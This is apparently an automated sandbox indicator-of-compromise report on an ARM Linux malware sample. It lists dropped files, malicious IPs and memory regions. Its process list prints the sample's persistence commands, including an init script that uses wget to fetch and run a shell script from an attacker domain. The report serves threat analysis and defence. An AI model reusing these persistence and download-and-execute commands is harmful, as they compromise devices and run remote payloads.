IOC Report
arm5.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
arm5.nn.elf
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
initial sample
 malicious
/etc/init.d/arm5.nn.elf
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/mybinary
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/profile
ASCII text
dropped
 malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
 malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/tmp/qemu-open.ItNjza (deleted)
ASCII text
dropped
/tmp/qemu-open.XYqTN7 (deleted)
ASCII text, with no line terminators
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/arm5.nn.elf
/tmp/arm5.nn.elf
/tmp/arm5.nn.elf
-
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/mybinary
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn.elf'\n /tmp/arm5.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm5.nn.elf'\n killall arm5.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm5.nn.elf"
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/arm5.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/arm5.nn.elf
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/arm5.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/arm5.nn.elf /etc/rc.d/S99arm5.nn.elf
/tmp/arm5.nn.elf
-
/usr/libexec/gnome-session-binary
-
/bin/sh
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
There are 24 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pen.gorillafirewall.su/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
154.216.17.220
unknown
Seychelles
malicious
91.92.246.113
unknown
Bulgaria
malicious
93.123.85.166
unknown
Bulgaria
malicious
45.202.35.64
unknown
Seychelles

Memdumps

Base Address
Regiontype
Protect
Malicious
7f337c02b000
page execute read
 malicious
7f3483518000
page read and write
7f34836fa000
page read and write
7f3483a6d000
page read and write
5616edf7b000
page read and write
7f337c033000
page read and write
7f347bfff000
page read and write
7f3483a04000
page read and write
7f34838db000
page read and write
7f337c037000
page read and write
7f3482dbc000
page read and write
7f347c021000
page read and write
7f348311e000
page read and write
7f3482d2a000
page read and write
5616f0235000
page read and write
7f3483389000
page read and write
5616edd21000
page execute read
7f3482522000
page read and write
7f3483a28000
page read and write
7ffd48b7f000
page execute read
7ffd48aa4000
page read and write
5616eff90000
page read and write
5616edf72000
page read and write
7f34833ac000
page read and write
5616eff79000
page execute and read and write
There are 15 hidden memdumps, click here to show them.